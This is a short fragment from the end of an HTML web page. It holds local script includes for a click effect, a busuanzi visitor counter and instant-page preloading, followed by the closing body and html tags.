</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
